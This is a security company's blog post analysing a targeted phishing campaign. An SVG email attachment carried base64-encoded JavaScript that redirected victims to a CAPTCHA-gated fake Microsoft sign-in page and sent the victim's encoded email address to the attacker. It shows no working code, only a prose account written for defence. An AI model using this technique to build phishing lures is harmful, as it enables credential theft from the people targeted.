All Posts
Threat Posts

SVG Phishing Email Attachment: A Recent Targeted Campaign

Erin Kuffel
April 7, 2025

Phishing attacks are deceptive by design, tweaking their process to subvert email security filters and often banking on the simple human urge to click. But browser security can be a crucial stopgap to preventing what gets through email. 

A sophisticated phishing attack recently intercepted by Keep Aware reveals the evolving tactics of threat actors. The attackers embedded malicious code within an image file that served two purposes: redirecting victims to a convincing Microsoft impersonation site while simultaneously notifying the attackers exactly which user had fallen for the trap. 

Here’s what happened and, more importantly, why it matters.

A Same-Day Registered Domain Blocked

Keep Aware blocked a user from accessing a malicious domain that had been registered mere hours earlier, intercepting the threat on the same day it was created. Although new domains can be legitimate (for example, when a developer launches a new site), they are most frequently seen amongst malicious campaigns. 

As shown by the below screenshot, the young domain is impersonating Microsoft and displays a CAPTCHA to avoid being flagged as phishing by security tools and automated crawlers.

Screenshot. The malicious website is impersonating Microsoft and requires completing a CAPTCHA before a victim may move forward to a fake login page.

Screenshot. The webpage’s footer, claiming to be Microsoft, adds to its apparent legitimacy.

Had this block not occurred, the user could have interacted with the CAPTCHA, progressed to a fake Microsoft sign-in page, and handed over valuable business credentials to an attacker.

Screenshot. The fake Microsoft sign in page following the CAPTCHA completion.

Tracing the Attack Back to an Email

Our logs reveal that the user’s browser request to this new domain directly followed the opening of an SVG file. Based on the logged file path, the image file was an Outlook email attachment.

Screenshot. Protocol (“file:///”) and file path of the SVG file shows the image file was an Outlook attachment, indicating this attack began as a phishing email.

The Targeted Email

 In collaboration with our customer, we analyzed the original message and discovered it was specifically crafted for the them, the target organization.

  • Subject & File Name: Both contained the business’s name, making the email seem relevant and legitimate.

  • References to a Wire Transfer: Common social engineering tactic, leveraging financial urgency to prompt immediate action.

Screenshot. Email subject, which contains the target business’s name and references to a wire transfer.

How the SVG Did the Dirty Work

An SVG is just a vector image file, but because it’s XML-based, it can contain scripts. In this case, the attacker embedded base64-encoded JavaScript inside the SVG. When opened in a browser (which occurs by default), the JavaScript executes and automatically redirects the user to the Microsoft impersonation site.

Code snippet of the SVG file attachment. Note the XML-based structure of the file and the use of encoded JavaScript. The redacted line is explained in the following section.

A Hidden Payload: Your Email Address

A particularly revealing detail in this SVG file is that it also included the target user’s email address—encoded as a URI parameter. This gives attackers exactly what they want—confirmation that someone took the bait. The moment the user opens the file (and triggers the redirect), the attacker’s server receives a web request containing that unique email in the URI query parameters. Even if the user didn’t ultimately hand over credentials, the attacker learned which user is “click-prone” and may keep targeting them.

Code snippet of the SVG file attachment. Note a variable’s value as a URI query parameter format, beginning with “?e=” and ending with the (redacted) target employee’s email address, base64-encoded.

Why This Matters

  1. Attackers Are Getting Creative
    Phishing used to rely on overly suspicious links or attachments. Now, attackers leverage file types like SVG—commonly overlooked as a harmless image—to execute hidden code.

  2. Attacker Feedback Loop, Increased Risk
    Even if the victim doesn’t enter credentials, the attacker still gains valuable information: this user opened the file, so they might be an easy target for future or more advanced phishing attempts. In other words, users who click are at an increased risk of future phishing attacks.

  3. Defense-In-Depth Is Essential
    In this incident, the target organization’s email security labeled the message as 100% malicious but still let it slip through—demonstrating that no single layer of security is foolproof. A multi-layered approach that includes the browser dramatically reduces risk. And, the earlier an attack can be stopped in its tracks, the less damage an organization faces.

Conclusion

This incident underscores just how inventive modern phishing attacks can be—and how browser security contributes to a strong, multilayered defense strategy. While some security filters may catch certain red flags, attackers constantly refine their methods to bypass automated detection. As we saw here, a simple image file can hide complex, personalized code that directs a victim to a malicious website and informs the attacker as to which users click malicious files. 

Ultimately, catching threats early is the best way to keep your employees and data out of an attacker’s reach. By sharing this incident and its details, we hope to underscore the importance of layered security and the positive impact of browser security. 

Share
Follow Keep Aware
Subscribe to Keep Aware

Stay up to date with the latest threat posts and browser security news from Keep Aware

Thank you for following Keep Aware!
Oops! Something went wrong while submitting the form.
Ready to see Keep Aware in action?
Schedule a personalized demo today and see how Keep Aware can protect your organization's biggest workplace.
Get Started
Request a Demo

Continue reading